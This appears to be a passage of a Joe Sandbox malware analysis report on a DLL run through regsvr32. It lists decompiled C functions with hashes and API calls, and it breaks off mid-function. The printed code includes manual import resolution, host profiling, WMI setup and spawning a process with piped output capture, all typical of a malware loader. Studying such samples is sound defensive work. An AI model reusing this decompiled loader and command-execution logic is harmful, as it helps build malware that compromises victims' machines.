Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
Instruction ID: 18f8f7fd9c3af9e43ea2b41f69ba211a484cfe72345a25ce6a4dcd653cb28466
Opcode Fuzzy Hash: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
Instruction Fuzzy Hash: F1411932B04145A7EB24CA988DA5BAE3AA8DF44384F200115FDC6DE296D6F5CED1C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 1000D523, Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E1000D523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x1001b848, 0, 1, 0x1001b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E10008604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
SysAllocString.OLEAUT32(00000000), ref: 1000D569
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 2855449287-0
Opcode ID: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
Instruction ID: 5bbdf4e47082d7f099f202f2147c83233ba5ae9393f0558d240139af4bbb2059
Opcode Fuzzy Hash: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
Instruction Fuzzy Hash: A6210931600255BBEB249B66CC4DE6FBFBCEFC6B55F11415EB901A6290DB70DA00CA30

Uniqueness

Uniqueness Score: -1.00%

Function 100121FF, Relevance: 7.6, APIs: 5, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E100121FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L100122CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L10012291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x10018250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L10012291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x10018258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}

APIs

localeconv.MSVCRT ref: 10012207
strchr.MSVCRT ref: 1001221A
_errno.MSVCRT ref: 10012229
strtod.MSVCRT ref: 10012237
_errno.MSVCRT ref: 10012264

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
Instruction ID: a7fe3fef6b6346813f09e77c4cbf996122cf10ff1875fbe8eea6711f7156c08d
Opcode Fuzzy Hash: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
Instruction Fuzzy Hash: 5D0124B9900145FADB02AF20E90168D3BA4EF463A0F3141C0E9806E1A1CB75D9F4C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000CF84, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000CF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x1001e688; // 0x1820590
				GetCurrentProcess();
				_t11 = E1000BA05();
				_t1 = _t29 + 0x1644; // 0x1821bd4
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E10008FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0x18207b8
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E10008FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E1000E3B6(_t3);
				_t7 = _t29 + 0x220; // 0x18207b0
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E1000E3F1(_t7);
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}

APIs

GetCurrentProcess.KERNEL32(?,?,01820590,?,10003545), ref: 1000CF90
GetModuleFileNameW.KERNEL32(00000000,01821BD4,00000105,?,?,01820590,?,10003545), ref: 1000CFB1
memset.MSVCRT ref: 1000CFE2
GetVersionExA.KERNEL32(01820590,01820590,?,10003545), ref: 1000CFED
GetCurrentProcessId.KERNEL32(?,10003545), ref: 1000CFF3

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CurrentProcess$FileModuleNameVersionmemset
String ID:
API String ID: 3581039275-0
Opcode ID: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
Instruction ID: 6868e59ac51cffefd4345363f154aaa4011aa3255cd34e47fa6660c1185ef8f7
Opcode Fuzzy Hash: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
Instruction Fuzzy Hash: ED015E749017149BE720DF70888AAEABBE5FF95350F00082DF59687251EB74B744CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1000A9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177
pipeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1000A9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E1000861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x1001e684; // 0x189faa0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x1001e684; // 0x189faa0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E10008604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x1001e684; // 0x189faa0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x1001e684; // 0x189faa0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x1001e684; // 0x189faa0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x1001e684; // 0x189faa0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E100091A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E10009292(_t127);
						E1000861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E1000C379(_t127));
				_t98 =  *0x1001e68c; // 0x189fc68
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x1001e684; // 0x189faa0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x1001e684; // 0x189faa0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E10009256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E1000861A( &_v32, 0);
				return _t128;
			}

APIs

memset.MSVCRT ref: 1000A9F4
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000AA18
CreatePipe.KERNEL32(100065A9,?,0000000C,00000000), ref: 1000AA2F

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660

Strings

D, xrefs: 1000AA4F

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateHeapPipe$AllocFreememset
String ID: D
API String ID: 488076629-2746444292
Opcode ID: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
Instruction ID: bbbe2e048bdb7ca281e90c8594452977dd6133e52a65fc6598db3d6a90d98c7d
Opcode Fuzzy Hash: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
Instruction Fuzzy Hash: DA512871D00219AFEB41CFA4CC85FDEBBB9FB08380F514169F604E7255EB75AA448B61

Uniqueness

Uniqueness Score: -1.00%

Function 1001249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E1001249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E1000E099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124B8
LoadLibraryA.KERNEL32(00000000), ref: 10012551

Strings

GetProcAddress, xrefs: 100124C1
kernel32.dll, xrefs: 100124B3

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
Instruction ID: 32dcb2393de001d92d0e2ea9b2cd9e3cf8e07861903f3f539e44592daf5cdc58
Opcode Fuzzy Hash: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
Instruction Fuzzy Hash: 7A617AB5D00209EFDB40CF98C881BADBBF1FF08355F208599E815AB2A1C774AA90DF50

Uniqueness

Uniqueness Score: -1.00%

Function 1000C4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
libraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x1001e688; // 0x1820590
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E100095E1(_t50, 0xb62);
					_t66 =  *0x1001e688; // 0x1820590
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E10009640( &_v140, 0x40, L"%08x", E1000D400(_t66 + 0xb0, E1000C379(_t66 + 0xb0), 0));
					_t20 =  *0x1001e688; // 0x1820590
					asm("sbb eax, eax");
					_t25 = E100095E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x1001e688; // 0x1820590
					_t68 = E100092E5(_t26 + 0x1020);
					_v12 = _t68;
					E100085D5( &_v8);
					_t32 =  *0x1001e688; // 0x1820590
					_t34 = E100092E5(_t32 + 0x122a);
					 *0x1001e784 = _t34;
					_t35 =  *0x1001e684; // 0x189faa0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x1001e784);
					 *0x1001e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E1000E171(0x1001bb48, _t60);
					}
					 *0x1001e780 = _t38;
					E1000861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x1001e780 != 0) {
						goto L10;
					} else {
						E1000861A(0x1001e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x1001e780 == 0) {
						_t46 =  *0x1001e6bc; // 0x189fbc8
						 *0x1001e780 = _t46;
					}
					L10:
					return 1;
				}
			}

APIs

LoadLibraryW.KERNEL32 ref: 1000C5C6
memset.MSVCRT ref: 1000C605

Strings

dll, xrefs: 1000C588
%08x, xrefs: 1000C52F

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoadmemset
String ID: %08x$dll
API String ID: 3406617148-2963171978
Opcode ID: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
Instruction ID: 605655cd81f1f69b7fa92b991eeeb1d6cfabf96bce0b9214bc1f1ebdb38bd664
Opcode Fuzzy Hash: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
Instruction Fuzzy Hash: 3331E3B2904358ABFB10CBA4DC89F9E33ECEB58394F408029F105E7191EB35EE818724

Uniqueness

Uniqueness Score: -1.00%

Function 10012D70, Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E10012D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E10015D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E10014AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E10014C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
